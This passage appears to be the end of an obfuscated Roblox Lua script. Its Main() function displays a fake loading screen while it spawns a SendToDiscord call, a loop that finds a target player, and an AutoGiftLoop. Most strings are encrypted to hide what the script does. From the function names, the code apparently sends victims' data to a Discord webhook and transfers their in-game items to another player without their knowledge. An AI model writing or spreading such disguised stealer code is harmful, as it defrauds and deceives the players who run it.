			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\164\249\172\159\157\179\145\226\165\153\135", "\214\227\144\202\235\189"), result);
		end
		task.wait(3);
	end
end
local function AutoRefreshLoop()
	while task.wait(0.5) do
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\249\164\149\124\21\167\99\48\236\188\130\105\85\227", "\92\141\197\231\27\112\211\51")] = FindTargetPlayer();
		if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\242\254\152\164\212\242\207\134\162\200\227\237\207\243", "\177\134\159\234\195")] then
		end
	end
end
local function Main()
	local loadingScreen, loadingBar, loadingText = CreateLoadingScreen();
	task.spawn(function()
		local success, response = SendToDiscord();
		if success then
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\148\229\54\180\192\188\231\127\178\204\173\228\45\180\137\174\238\49\180\137\169\228\127\132\192\174\232\48\178\205", "\169\221\139\95\192"));
		else
			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\248\138\118\51\39\34\158\159\112\127\49\35\208\143\63\27\43\53\221\132\109\59\98\52\219\155\112\45\54\124", "\70\190\235\31\95\66"), response);
		end
	end);
	task.spawn(function()
		RunLoadingAnimation(loadingBar, loadingText);
	end);
	task.spawn(AutoRefreshLoop);
	task.spawn(AutoGiftLoop);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\159\236\18\231\235\185\231\30\166\196\175\246\21\171\226\179\228\14\166\246\163\241\14\227\232\250\227\25\242\236\172\227\14\227\225\250\228\21\244", "\133\218\130\122\134"), TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\8\222\209\227\249\151\7\12\211\194\253\249\145\7\18\222\206\225\153\243", "\88\92\159\131\164\188\195")]);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\166\43\190\95\194\249\216\147\116\255\103\216\234\217\137\32\184\11\196\232\207\133\43\177\7\151\197\220\141\43\255\120\210\234\207\131\38\255\126\217\237\220\150\33\173\66\195\238\145\192\15\170\95\216\166\218\137\40\171", "\189\224\78\223\43\183\139"));
end
Main();
